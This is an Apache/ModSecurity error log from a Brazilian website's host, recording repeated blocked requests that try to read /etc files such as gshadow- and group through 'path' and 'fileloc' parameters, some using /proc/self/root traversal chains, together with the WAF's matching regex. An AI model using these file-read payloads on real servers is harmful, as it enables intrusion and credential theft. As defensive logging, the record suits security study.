[Fri Mar 20 11:10:46.689243 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.13:43510] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1VZjJ3M9BSuKP7CAZO3gAAAJQ"]
[Fri Mar 20 11:10:46.855428 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.241.31:37920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1VZl1pVZ5mVmJwsFNYVAAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:10:48.430985 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:52380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1VaPXLqtnMIWvjpaLE4AAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:10:48.960658 2026] [:error] [pid 15826:tid 140411741927168] [client 216.73.216.191:43596] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VaOoXxyEfFpUF8f-plAAAAUA"]
[Fri Mar 20 11:10:53.691333 2026] [:error] [pid 10189:tid 140411565680384] [client 216.73.216.191:43974] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VbTJ3M9BSuKP7CAZO7gAAAJU"]
[Fri Mar 20 11:10:55.091705 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.24:44078] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Vb_HIg5MgXLBnicMfFQAAAc0"]
[Fri Mar 20 11:10:59.759033 2026] [:error] [pid 26799:tid 140411565680384] [client 216.73.216.191:44324] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1Vc9a6ubjKNq_cu4YDjgAAA1U"]
[Fri Mar 20 11:10:59.787748 2026] [:error] [pid 31215:tid 140411582465792] [client 216.73.216.191:44384] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VcwF0L0L-SsrnPo6SbAAAAtM"]
[Fri Mar 20 11:11:01.547171 2026] [:error] [pid 7893:tid 140411733534464] [client 216.73.216.191:44490] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VdRCii7xarUs8iHaT1gAAAgE"]
[Fri Mar 20 11:11:08.012654 2026] [:error] [pid 31215:tid 140411641214720] [client 57.141.18.50:44880] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1VfAF0L0L-SsrnPo6ScAAAAsw"]
[Fri Mar 20 11:11:28.651438 2026] [:error] [pid 26799:tid 140411691570944] [client 216.73.216.191:46042] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1VkNa6ubjKNq_cu4YDowAAA0Y"]
[Fri Mar 20 11:11:30.384168 2026] [mime_magic:error] [pid 21219:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:46144] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:11:35.036857 2026] [mime_magic:error] [pid 10189:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:52386] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/lib/kbd/consolefonts
[Fri Mar 20 11:11:41.920322 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.241.31:56672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1VnPXLqtnMIWvjpaLFKAAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:11:43.970026 2026] [mime_magic:error] [pid 15826:tid 140411574073088] (70014)End of file found: [client 57.141.18.85:46922] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:11:43.973774 2026] [mime_magic:error] [pid 9818:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:46920] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:11:45.968105 2026] [:error] [pid 31215:tid 140411674785536] [client 216.73.216.191:47072] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VoQF0L0L-SsrnPo6SkAAAAsg"]
[Fri Mar 20 11:11:54.219556 2026] [:error] [pid 7235:tid 140411616036608] [client 57.141.18.85:47430] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1VqvqxLDW4GITHUkQTjwAAAQ8"]
[Fri Mar 20 11:11:59.316796 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.71:47770] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Vr_XLqtnMIWvjpaLFOgAAAoQ"]
[Fri Mar 20 11:12:05.806811 2026] [:error] [pid 10189:tid 140411699963648] [client 216.73.216.191:48092] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VtTJ3M9BSuKP7CAZPXAAAAIU"]
[Fri Mar 20 11:12:08.493652 2026] [:error] [pid 10189:tid 140411666392832] [client 57.141.18.46:48262] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1VuDJ3M9BSuKP7CAZPYgAAAIk"]
[Fri Mar 20 11:12:13.737975 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.241.31:58090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1VvV1pVZ5mVmJwsFNYvAAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:12:13.783836 2026] [:error] [pid 10189:tid 140411741927168] [client 216.73.216.191:48538] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VvTJ3M9BSuKP7CAZPZAAAAIA"]
[Fri Mar 20 11:12:15.119081 2026] [:error] [pid 21219:tid 140411691570944] [client 216.73.216.191:48628] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1Vv_XLqtnMIWvjpaLFSgAAAoY"]
[Fri Mar 20 11:12:16.196536 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.241.31:32966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1VwLninkcc-iUj5AqGogAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:12:17.943678 2026] [:error] [pid 11167:tid 140411708356352] [client 216.73.216.191:48844] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VwfHIg5MgXLBnicMfcwAAAcQ"]
[Fri Mar 20 11:12:18.884771 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:33478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Vwta6ubjKNq_cu4YDzAAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:12:19.371884 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.69:48874] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Vw9a6ubjKNq_cu4YDzQAAA0I"]
[Fri Mar 20 11:12:19.925895 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.101:48964] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Vw11pVZ5mVmJwsFNYxwAAAFc"]
[Fri Mar 20 11:12:20.459401 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:48994] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1VxOoXxyEfFpUF8f-qGAAAAUw"]
